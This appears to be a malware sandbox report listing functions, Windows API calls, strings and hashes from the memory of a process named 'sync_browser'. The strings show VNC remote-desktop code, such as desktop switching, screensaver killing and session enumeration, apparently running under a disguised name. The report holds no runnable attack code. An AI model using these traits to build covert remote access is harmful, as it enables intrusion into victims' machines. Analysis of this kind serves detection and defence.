Associated: 00000016.00000002.3193857745.00007FF67E9F4000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000016.00000002.3193857745.00007FF67EA3C000.00000002.00000001.01000000.00000007.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_22_2_7ff67e7c0000_sync_browser.jbxd

Yara matches

Similarity

API ID: CriticalSection$LeaveObject$BitmapCompatibleCreateDeleteEnterSelect
String ID:
API String ID: 4219907860-0
Opcode ID: 956026f9412a0f1138a85547ad9db4196a3aa927d16836a46ddc08f3773cee07
Instruction ID: 17a1394946205b5e5f3315141fb9286950674da3ca5ee51911e9fa6ad08ba5a9
Opcode Fuzzy Hash: 956026f9412a0f1138a85547ad9db4196a3aa927d16836a46ddc08f3773cee07
Instruction Fuzzy Hash: 79416723A286929AE7209F55E8446AEB394FB98BD8F005135EE4E87B54DF3CD109CB00

Function 00007FF67E7D1640 Relevance: 19.4, APIs: 5, Strings: 6, Instructions: 132COMMON

Download Yara Rule

APIs

GetVersionExA.KERNEL32 ref: 00007FF67E7D1671
GetModuleFileNameA.KERNEL32 ref: 00007FF67E7D16B3
GetPrivateProfileIntA.KERNEL32 ref: 00007FF67E7D1767
GetPrivateProfileIntA.KERNEL32 ref: 00007FF67E7D1790
GetPrivateProfileStringA.KERNEL32 ref: 00007FF67E7D17CE

Strings

-service_run, xrefs: 00007FF67E7D184B
kickrdp, xrefs: 00007FF67E7D1759
service_commandline, xrefs: 00007FF67E7D17B3
_run, xrefs: 00007FF67E7D172A
clearconsole, xrefs: 00007FF67E7D177C
admin, xrefs: 00007FF67E7D1760, 00007FF67E7D1783, 00007FF67E7D17BF

Memory Dump Source

Source File: 00000016.00000002.3193575048.00007FF67E7C1000.00000020.00000001.01000000.00000007.sdmp, Offset: 00007FF67E7C0000, based on PE: true

Associated: 00000016.00000002.3193546173.00007FF67E7C0000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000016.00000002.3193682358.00007FF67E899000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000016.00000002.3193733474.00007FF67E8CD000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000016.00000002.3193759595.00007FF67E8CF000.00000008.00000001.01000000.00000007.sdmpDownload File
Associated: 00000016.00000002.3193789691.00007FF67E8D0000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000016.00000002.3193789691.00007FF67E91B000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000016.00000002.3193789691.00007FF67E948000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000016.00000002.3193857745.00007FF67E981000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000016.00000002.3193857745.00007FF67E9F4000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000016.00000002.3193857745.00007FF67EA3C000.00000002.00000001.01000000.00000007.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_22_2_7ff67e7c0000_sync_browser.jbxd

Yara matches

Similarity

API ID: PrivateProfile$FileModuleNameStringVersion
String ID: -service_run$_run$admin$clearconsole$kickrdp$service_commandline
API String ID: 769895750-1251308945
Opcode ID: 24b3510015302fc578f6c228e9c0541bd07d85315ab1c4ac955448dfc9505119
Instruction ID: 4aa3e65281f22c969ae1d7f3fa7423e9f2c0bb7bfb42458fa4335826d4e942e6
Opcode Fuzzy Hash: 24b3510015302fc578f6c228e9c0541bd07d85315ab1c4ac955448dfc9505119
Instruction Fuzzy Hash: 51519066A6868285E760CB64E4402BAB7A0FB557B0F448336FA7D836E5CF3DD44DC710

Function 00007FF67E7EF790 Relevance: 19.3, APIs: 7, Strings: 4, Instructions: 63windowCOMMON

Download Yara Rule

APIs

GetVersionExA.KERNEL32 ref: 00007FF67E7EF7B6
OpenDesktopA.USER32 ref: 00007FF67E7EF809
EnumDesktopWindows.USER32 ref: 00007FF67E7EF83C
CloseDesktop.USER32 ref: 00007FF67E7EF845
SystemParametersInfoA.USER32 ref: 00007FF67E7EF85B
FindWindowA.USER32 ref: 00007FF67E7EF88A
PostMessageA.USER32 ref: 00007FF67E7EF8A2

Strings

WindowsScreenSaverClass, xrefs: 00007FF67E7EF881
vncdesktop.cpp : KillScreenSaver..., xrefs: 00007FF67E7EF7C4
vncdesktop.cpp : Killing ScreenSaver, xrefs: 00007FF67E7EF817
Screen-saver, xrefs: 00007FF67E7EF7EF

Memory Dump Source

Source File: 00000016.00000002.3193575048.00007FF67E7C1000.00000020.00000001.01000000.00000007.sdmp, Offset: 00007FF67E7C0000, based on PE: true

Associated: 00000016.00000002.3193546173.00007FF67E7C0000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000016.00000002.3193682358.00007FF67E899000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000016.00000002.3193733474.00007FF67E8CD000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000016.00000002.3193759595.00007FF67E8CF000.00000008.00000001.01000000.00000007.sdmpDownload File
Associated: 00000016.00000002.3193789691.00007FF67E8D0000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000016.00000002.3193789691.00007FF67E91B000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000016.00000002.3193789691.00007FF67E948000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000016.00000002.3193857745.00007FF67E981000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000016.00000002.3193857745.00007FF67E9F4000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000016.00000002.3193857745.00007FF67EA3C000.00000002.00000001.01000000.00000007.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_22_2_7ff67e7c0000_sync_browser.jbxd

Yara matches

Similarity

API ID: Desktop$CloseEnumFindInfoMessageOpenParametersPostSystemVersionWindowWindows
String ID: Screen-saver$WindowsScreenSaverClass$vncdesktop.cpp : KillScreenSaver...$vncdesktop.cpp : Killing ScreenSaver
API String ID: 1547096108-1130181218
Opcode ID: 0218681f0ca0f0cb8045d3d881905bd2119dca5bb8d2230a423cfe654c101359
Instruction ID: 70df1adb1c0c2014bd16a7f9b83b6f94ecccba0b80eb7cebd6fff1b46297e01e
Opcode Fuzzy Hash: 0218681f0ca0f0cb8045d3d881905bd2119dca5bb8d2230a423cfe654c101359
Instruction Fuzzy Hash: 50316427E38A4281FB64DB15E8657B9A351FFA8704F845131E90E82B95DE3CE01DC700

Function 00007FF67E7C4680 Relevance: 19.3, APIs: 6, Strings: 5, Instructions: 61libraryloaderCOMMON

Download Yara Rule

APIs

InitializeCriticalSection.KERNEL32 ref: 00007FF67E7C46A0
GetModuleHandleA.KERNEL32 ref: 00007FF67E7C46C5
GetProcAddress.KERNEL32 ref: 00007FF67E7C46DA
GetModuleHandleA.KERNEL32 ref: 00007FF67E7C46F2
GetProcAddress.KERNEL32 ref: 00007FF67E7C4707
GetTickCount.KERNEL32 ref: 00007FF67E7C475E

Strings

kernel32.dll, xrefs: 00007FF67E7C46A8
0, xrefs: 00007FF67E7C46BE
GetSystemTimes, xrefs: 00007FF67E7C46D0
ntdll.dll, xrefs: 00007FF67E7C46EB
NtQuerySystemInformation, xrefs: 00007FF67E7C46FD

Memory Dump Source

Source File: 00000016.00000002.3193575048.00007FF67E7C1000.00000020.00000001.01000000.00000007.sdmp, Offset: 00007FF67E7C0000, based on PE: true

Associated: 00000016.00000002.3193546173.00007FF67E7C0000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000016.00000002.3193682358.00007FF67E899000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000016.00000002.3193733474.00007FF67E8CD000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000016.00000002.3193759595.00007FF67E8CF000.00000008.00000001.01000000.00000007.sdmpDownload File
Associated: 00000016.00000002.3193789691.00007FF67E8D0000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000016.00000002.3193789691.00007FF67E91B000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000016.00000002.3193789691.00007FF67E948000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000016.00000002.3193857745.00007FF67E981000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000016.00000002.3193857745.00007FF67E9F4000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000016.00000002.3193857745.00007FF67EA3C000.00000002.00000001.01000000.00000007.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_22_2_7ff67e7c0000_sync_browser.jbxd

Yara matches

Similarity

API ID: AddressHandleModuleProc$CountCriticalInitializeSectionTick
String ID: 0$GetSystemTimes$NtQuerySystemInformation$kernel32.dll$ntdll.dll
API String ID: 649669561-4005017345
Opcode ID: eb4ac79b3cafd47dc512236d2ad93d7dd504d87db7fd05d4a85e566fa415a874
Instruction ID: 871a5cda80039efd594e1a1768f5014084f1e42a876aecba17252a1fd3c83cd6
Opcode Fuzzy Hash: eb4ac79b3cafd47dc512236d2ad93d7dd504d87db7fd05d4a85e566fa415a874
Instruction Fuzzy Hash: 61214F32A29B0586EB44DF64E844368B3E4FF68B94F444134E96D873A4EF3CE448C740

Function 00007FF67E7D8090 Relevance: 19.3, APIs: 10, Strings: 1, Instructions: 56synchronizationCOMMON

Download Yara Rule

APIs

EnterCriticalSection.KERNEL32 ref: 00007FF67E7D80B5
ResetEvent.KERNEL32 ref: 00007FF67E7D80D2
ResetEvent.KERNEL32 ref: 00007FF67E7D80DC
SetEvent.KERNEL32 ref: 00007FF67E7D80E6
WaitForSingleObject.KERNEL32 ref: 00007FF67E7D80F5
LeaveCriticalSection.KERNEL32 ref: 00007FF67E7D8101
EnterCriticalSection.KERNEL32 ref: 00007FF67E7D812E
WaitForSingleObject.KERNEL32 ref: 00007FF67E7D813D
SetEvent.KERNEL32 ref: 00007FF67E7D815C
LeaveCriticalSection.KERNEL32 ref: 00007FF67E7D816E

Strings

c, xrefs: 00007FF67E7D811E

Memory Dump Source

Source File: 00000016.00000002.3193575048.00007FF67E7C1000.00000020.00000001.01000000.00000007.sdmp, Offset: 00007FF67E7C0000, based on PE: true

Associated: 00000016.00000002.3193546173.00007FF67E7C0000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000016.00000002.3193682358.00007FF67E899000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000016.00000002.3193733474.00007FF67E8CD000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000016.00000002.3193759595.00007FF67E8CF000.00000008.00000001.01000000.00000007.sdmpDownload File
Associated: 00000016.00000002.3193789691.00007FF67E8D0000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000016.00000002.3193789691.00007FF67E91B000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000016.00000002.3193789691.00007FF67E948000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000016.00000002.3193857745.00007FF67E981000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000016.00000002.3193857745.00007FF67E9F4000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000016.00000002.3193857745.00007FF67EA3C000.00000002.00000001.01000000.00000007.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_22_2_7ff67e7c0000_sync_browser.jbxd

Yara matches

Similarity

API ID: CriticalEventSection$EnterLeaveObjectResetSingleWait
String ID: c
API String ID: 295735435-112844655
Opcode ID: fa268cb6b2df6a727f3079fd17a88c909c0169f6597272d12e4c6e15257d5989
Instruction ID: 16d2a13c8dc93ca4e66fac70cd680413ea05229877d410915028443f6eac57ce
Opcode Fuzzy Hash: fa268cb6b2df6a727f3079fd17a88c909c0169f6597272d12e4c6e15257d5989
Instruction Fuzzy Hash: 4221DF26A28A4183EA20DF65F4540AAA374FB98B91F541032EB9F87765DF3DE449C740

Function 00007FF67E7C47C0 Relevance: 18.3, APIs: 12, Instructions: 288COMMON

Download Yara Rule

APIs

EnterCriticalSection.KERNEL32 ref: 00007FF67E7C47FE
GetTickCount.KERNEL32 ref: 00007FF67E7C4814
LeaveCriticalSection.KERNEL32 ref: 00007FF67E7C4838

Memory Dump Source

Source File: 00000016.00000002.3193575048.00007FF67E7C1000.00000020.00000001.01000000.00000007.sdmp, Offset: 00007FF67E7C0000, based on PE: true

Associated: 00000016.00000002.3193546173.00007FF67E7C0000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000016.00000002.3193682358.00007FF67E899000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000016.00000002.3193733474.00007FF67E8CD000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000016.00000002.3193759595.00007FF67E8CF000.00000008.00000001.01000000.00000007.sdmpDownload File
Associated: 00000016.00000002.3193789691.00007FF67E8D0000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000016.00000002.3193789691.00007FF67E91B000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000016.00000002.3193789691.00007FF67E948000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000016.00000002.3193857745.00007FF67E981000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000016.00000002.3193857745.00007FF67E9F4000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000016.00000002.3193857745.00007FF67EA3C000.00000002.00000001.01000000.00000007.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_22_2_7ff67e7c0000_sync_browser.jbxd

Yara matches

Similarity

API ID: CriticalSection$CountEnterLeaveTick
String ID:
API String ID: 1056156058-0
Opcode ID: 4e1fcf1f9d5970b8c335a6cd4b3d0a08090c87295cd844a4afdb87dd54e77e75
Instruction ID: 97d80cc149c10b353e329d60774f25e4be3b3a6beef0cddbe24cb48d06b7b547
Opcode Fuzzy Hash: 4e1fcf1f9d5970b8c335a6cd4b3d0a08090c87295cd844a4afdb87dd54e77e75
Instruction Fuzzy Hash: 24D16377A19B4685EB20CF29E4412A973E9FB65B88F405136FA5C87B68DF3CE419C700

Function 00007FF67E7D0760 Relevance: 18.2, APIs: 12, Instructions: 181COMMON

Download Yara Rule

APIs

CombineRgn.GDI32 ref: 00007FF67E7D079E
CombineRgn.GDI32 ref: 00007FF67E7D088B
CombineRgn.GDI32 ref: 00007FF67E7D08B8
CombineRgn.GDI32 ref: 00007FF67E7D08EC
GetRegionData.GDI32 ref: 00007FF67E7D08FC
GetRegionData.GDI32 ref: 00007FF67E7D0926
GetRegionData.GDI32 ref: 00007FF67E7D095F
DeleteObject.GDI32 ref: 00007FF67E7D098E
free.LIBCMT ref: 00007FF67E7D0999
DeleteObject.GDI32 ref: 00007FF67E7D09A2
free.LIBCMT ref: 00007FF67E7D09AD
DeleteObject.GDI32 ref: 00007FF67E7D09B8

Memory Dump Source

Source File: 00000016.00000002.3193575048.00007FF67E7C1000.00000020.00000001.01000000.00000007.sdmp, Offset: 00007FF67E7C0000, based on PE: true

Associated: 00000016.00000002.3193546173.00007FF67E7C0000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000016.00000002.3193682358.00007FF67E899000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000016.00000002.3193733474.00007FF67E8CD000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000016.00000002.3193759595.00007FF67E8CF000.00000008.00000001.01000000.00000007.sdmpDownload File
Associated: 00000016.00000002.3193789691.00007FF67E8D0000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000016.00000002.3193789691.00007FF67E91B000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000016.00000002.3193789691.00007FF67E948000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000016.00000002.3193857745.00007FF67E981000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000016.00000002.3193857745.00007FF67E9F4000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000016.00000002.3193857745.00007FF67EA3C000.00000002.00000001.01000000.00000007.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_22_2_7ff67e7c0000_sync_browser.jbxd

Yara matches

Similarity

API ID: Combine$DataDeleteObjectRegion$free
String ID:
API String ID: 1378972593-0
Opcode ID: cb15224673a3dfde0a5a84031da156aebc3bdcfdfc834712c68d2b408893385e
Instruction ID: e977d45f9f437af1aad40daaceb3dd29ed5ac9b8b1aeeb50e0fd4ae3dcc589e6
Opcode Fuzzy Hash: cb15224673a3dfde0a5a84031da156aebc3bdcfdfc834712c68d2b408893385e
Instruction Fuzzy Hash: 1571E1B7A146818AEB50CF2AE4405ADBBA1FB58BD4B149032EF4D83754CF3CD495CB40

Function 00007FF67E830440 Relevance: 18.1, APIs: 12, Instructions: 110memoryCOMMON

Download Yara Rule

APIs

GlobalLock.KERNEL32 ref: 00007FF67E83045F
GlobalAlloc.KERNEL32(?,?,?,00007FF67E7EC1D3), ref: 00007FF67E830479
GlobalUnlock.KERNEL32 ref: 00007FF67E830492

Part of subcall function 00007FF67E831740: free.LIBCMT ref: 00007FF67E831777

GlobalFree.KERNEL32 ref: 00007FF67E83049F
GlobalLock.KERNEL32 ref: 00007FF67E8304BA
GlobalUnlock.KERNEL32 ref: 00007FF67E8304D3
GlobalFree.KERNEL32 ref: 00007FF67E8304E0
GlobalFree.KERNEL32 ref: 00007FF67E8304ED
GlobalUnlock.KERNEL32 ref: 00007FF67E830607
GlobalFree.KERNEL32 ref: 00007FF67E830614
GlobalUnlock.KERNEL32 ref: 00007FF67E830626
GlobalFree.KERNEL32 ref: 00007FF67E830633

Memory Dump Source

Source File: 00000016.00000002.3193575048.00007FF67E7C1000.00000020.00000001.01000000.00000007.sdmp, Offset: 00007FF67E7C0000, based on PE: true

Associated: 00000016.00000002.3193546173.00007FF67E7C0000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000016.00000002.3193682358.00007FF67E899000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000016.00000002.3193733474.00007FF67E8CD000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000016.00000002.3193759595.00007FF67E8CF000.00000008.00000001.01000000.00000007.sdmpDownload File
Associated: 00000016.00000002.3193789691.00007FF67E8D0000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000016.00000002.3193789691.00007FF67E91B000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000016.00000002.3193789691.00007FF67E948000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000016.00000002.3193857745.00007FF67E981000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000016.00000002.3193857745.00007FF67E9F4000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000016.00000002.3193857745.00007FF67EA3C000.00000002.00000001.01000000.00000007.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_22_2_7ff67e7c0000_sync_browser.jbxd

Yara matches

Similarity

API ID: Global$Free$Unlock$Lock$Allocfree
String ID:
API String ID: 2417228145-0
Opcode ID: 83e6b6226f67f1017ea51708f5668e2a6f5a10fa7ee1f8b094fae28aff0d63d9
Instruction ID: 5f7b6e2f80f0adae1adcdd1ce2144a3185b4e7bee4ccc7429a6d34fa822b0d9c
Opcode Fuzzy Hash: 83e6b6226f67f1017ea51708f5668e2a6f5a10fa7ee1f8b094fae28aff0d63d9
Instruction Fuzzy Hash: 56510877A15B4685DB508F2AE4802E8B7A4FBA8F98F094036DE5D87768DF38D488D710

Function 00007FF67E7C55D0 Relevance: 18.0, APIs: 7, Strings: 5, Instructions: 48COMMON

Download Yara Rule

APIs

InitializeCriticalSection.KERNEL32 ref: 00007FF67E7C55EC
InitializeCriticalSection.KERNEL32 ref: 00007FF67E7C55F9
sprintf.LIBCMT ref: 00007FF67E7C5623

Part of subcall function 00007FF67E877C50: _errno.LIBCMT ref: 00007FF67E877C88
Part of subcall function 00007FF67E877C50: _invalid_parameter_noinfo.LIBCMT ref: 00007FF67E877C93

sprintf.LIBCMT ref: 00007FF67E7C5636
sprintf.LIBCMT ref: 00007FF67E7C5649
sprintf.LIBCMT ref: 00007FF67E7C565C
sprintf.LIBCMT ref: 00007FF67E7C566F

Strings

Plugin.dsm, xrefs: 00007FF67E7C5668
0.0.0, xrefs: 00007FF67E7C562F
Someone, xrefs: 00007FF67E7C5655
12-12-2002, xrefs: 00007FF67E7C5642
Unknown, xrefs: 00007FF67E7C5605

Memory Dump Source

Source File: 00000016.00000002.3193575048.00007FF67E7C1000.00000020.00000001.01000000.00000007.sdmp, Offset: 00007FF67E7C0000, based on PE: true

Associated: 00000016.00000002.3193546173.00007FF67E7C0000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000016.00000002.3193682358.00007FF67E899000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000016.00000002.3193733474.00007FF67E8CD000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000016.00000002.3193759595.00007FF67E8CF000.00000008.00000001.01000000.00000007.sdmpDownload File
Associated: 00000016.00000002.3193789691.00007FF67E8D0000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000016.00000002.3193789691.00007FF67E91B000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000016.00000002.3193789691.00007FF67E948000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000016.00000002.3193857745.00007FF67E981000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000016.00000002.3193857745.00007FF67E9F4000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000016.00000002.3193857745.00007FF67EA3C000.00000002.00000001.01000000.00000007.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_22_2_7ff67e7c0000_sync_browser.jbxd

Yara matches

Similarity

API ID: sprintf$CriticalInitializeSection$_errno_invalid_parameter_noinfo
String ID: 0.0.0$12-12-2002$Plugin.dsm$Someone$Unknown
API String ID: 524037307-261918508
Opcode ID: 4e3ff866f97a8194c4c278236100d924ee412cec83e3f0554b4225ebfdf1fe97
Instruction ID: 82c43758c4dc4386164a62eff6e4c36cfa795b0d1145d6359e8c9524e436541f
Opcode Fuzzy Hash: 4e3ff866f97a8194c4c278236100d924ee412cec83e3f0554b4225ebfdf1fe97
Instruction Fuzzy Hash: 1421F433514B8291D701DF24E9842E8B3ACFF64B88F584136EA4C4B6A9DF3D9299C314

Function 00007FF67E7E5709 Relevance: 17.8, APIs: 3, Strings: 7, Instructions: 264COMMON

Download Yara Rule

APIs

OpenInputDesktop.USER32 ref: 00007FF67E7E407F
CloseDesktop.USER32 ref: 00007FF67E7E40C2

Strings

vncclient.cpp : rfbSetServerInput: inputs %s, xrefs: 00007FF67E7E5777
vncservice.cpp : OpenInputdesktop2 OK, xrefs: 00007FF67E7E409A
disabled, xrefs: 00007FF67E7E576C
vncservice.cpp : OpenInputdesktop2 NULL, xrefs: 00007FF67E7E4060
vncservice.cpp : SelectDesktop , xrefs: 00007FF67E7E404B
vncclient.cpp : vncClientThread , xrefs: 00007FF67E7E4029
enabled, xrefs: 00007FF67E7E575E

Memory Dump Source

Source File: 00000016.00000002.3193575048.00007FF67E7C1000.00000020.00000001.01000000.00000007.sdmp, Offset: 00007FF67E7C0000, based on PE: true

Associated: 00000016.00000002.3193546173.00007FF67E7C0000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000016.00000002.3193682358.00007FF67E899000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000016.00000002.3193733474.00007FF67E8CD000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000016.00000002.3193759595.00007FF67E8CF000.00000008.00000001.01000000.00000007.sdmpDownload File
Associated: 00000016.00000002.3193789691.00007FF67E8D0000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000016.00000002.3193789691.00007FF67E91B000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000016.00000002.3193789691.00007FF67E948000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000016.00000002.3193857745.00007FF67E981000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000016.00000002.3193857745.00007FF67E9F4000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000016.00000002.3193857745.00007FF67EA3C000.00000002.00000001.01000000.00000007.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_22_2_7ff67e7c0000_sync_browser.jbxd

Yara matches

Similarity

API ID: Desktop$CloseInputOpen
String ID: disabled$enabled$vncclient.cpp : rfbSetServerInput: inputs %s$vncclient.cpp : vncClientThread $vncservice.cpp : OpenInputdesktop2 NULL$vncservice.cpp : OpenInputdesktop2 OK$vncservice.cpp : SelectDesktop
API String ID: 1367241101-2270697846
Opcode ID: 1b183829833fec8f16a716ecdcb68095327f5337e21e681376bb5099e03e3359
Instruction ID: 3085f53276cc362bf4635ab5bccc8f739e1d79f7887e2cc9c504e683504deb43
Opcode Fuzzy Hash: 1b183829833fec8f16a716ecdcb68095327f5337e21e681376bb5099e03e3359
Instruction Fuzzy Hash: 79D1C423A28AC185FB50CB25C4587FE3BA5EBA5B84F594171EA4C8B7A5DF3CD849C700

Function 00007FF67E7DFC70 Relevance: 17.7, APIs: 8, Strings: 2, Instructions: 153threadCOMMON

Download Yara Rule

APIs

getpeername.WS2_32 ref: 00007FF67E7DFCD7
inet_ntoa.WS2_32 ref: 00007FF67E7DFCE1

Part of subcall function 00007FF67E877978: malloc.LIBCMT ref: 00007FF67E877992

Part of subcall function 00007FF67E82CEF0: getpeername.WS2_32 ref: 00007FF67E82CF19
Part of subcall function 00007FF67E82CEF0: inet_ntoa.WS2_32 ref: 00007FF67E82CF23

Part of subcall function 00007FF67E8792A4: malloc.LIBCMT ref: 00007FF67E8792C7

OpenInputDesktop.USER32 ref: 00007FF67E7DFE74
GetCurrentThreadId.KERNEL32 ref: 00007FF67E7DFE7D
GetThreadDesktop.USER32 ref: 00007FF67E7DFE85
SetThreadDesktop.USER32 ref: 00007FF67E7DFE91

Part of subcall function 00007FF67E7DA810: DialogBoxParamA.USER32 ref: 00007FF67E7DA838

SetThreadDesktop.USER32 ref: 00007FF67E7DFEB0
CloseDesktop.USER32 ref: 00007FF67E7DFEB9

Strings

Default, xrefs: 00007FF67E7DFD3D
<unavailable>, xrefs: 00007FF67E7DFCE7

Memory Dump Source

Source File: 00000016.00000002.3193575048.00007FF67E7C1000.00000020.00000001.01000000.00000007.sdmp, Offset: 00007FF67E7C0000, based on PE: true

Associated: 00000016.00000002.3193546173.00007FF67E7C0000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000016.00000002.3193682358.00007FF67E899000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000016.00000002.3193733474.00007FF67E8CD000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000016.00000002.3193759595.00007FF67E8CF000.00000008.00000001.01000000.00000007.sdmpDownload File
Associated: 00000016.00000002.3193789691.00007FF67E8D0000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000016.00000002.3193789691.00007FF67E91B000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000016.00000002.3193789691.00007FF67E948000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000016.00000002.3193857745.00007FF67E981000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000016.00000002.3193857745.00007FF67E9F4000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000016.00000002.3193857745.00007FF67EA3C000.00000002.00000001.01000000.00000007.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_22_2_7ff67e7c0000_sync_browser.jbxd

Yara matches

Similarity

API ID: Desktop$Thread$getpeernameinet_ntoamalloc$CloseCurrentDialogInputOpenParam
String ID: <unavailable>$Default
API String ID: 424836046-797050109
Opcode ID: 98fc22b2c741167fb21f147bf9af3384dc3264d7e77bf2663b2028b435dc0a59
Instruction ID: 63b945c39fae594686ab1eb9dedda9f6b5e56b024f9d0e3e9171ed99197d212c
Opcode Fuzzy Hash: 98fc22b2c741167fb21f147bf9af3384dc3264d7e77bf2663b2028b435dc0a59
Instruction Fuzzy Hash: 92617D27A28A4682EB64DB25D85427D73A4FB94F84F144135EE0E8B795DF3CD959C300

Function 00007FF67E7D2520 Relevance: 17.6, APIs: 6, Strings: 4, Instructions: 97libraryloaderCOMMON

Download Yara Rule

APIs

LoadLibraryA.KERNEL32 ref: 00007FF67E7D2551
GetProcAddress.KERNEL32 ref: 00007FF67E7D256E
LoadLibraryA.KERNEL32 ref: 00007FF67E7D258B
GetProcAddress.KERNEL32 ref: 00007FF67E7D25A8
FreeLibrary.KERNEL32 ref: 00007FF67E7D2658
FreeLibrary.KERNEL32 ref: 00007FF67E7D2667

Strings

wtsapi32, xrefs: 00007FF67E7D254A, 00007FF67E7D2584
WTSEnumerateSessionsA, xrefs: 00007FF67E7D2564
Console, xrefs: 00007FF67E7D2605
WTSFreeMemory, xrefs: 00007FF67E7D259E

Memory Dump Source

Source File: 00000016.00000002.3193575048.00007FF67E7C1000.00000020.00000001.01000000.00000007.sdmp, Offset: 00007FF67E7C0000, based on PE: true

Associated: 00000016.00000002.3193546173.00007FF67E7C0000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000016.00000002.3193682358.00007FF67E899000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000016.00000002.3193733474.00007FF67E8CD000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000016.00000002.3193759595.00007FF67E8CF000.00000008.00000001.01000000.00000007.sdmpDownload File
Associated: 00000016.00000002.3193789691.00007FF67E8D0000.00000004.00000001.01000000.00000007.sdmpDownload File
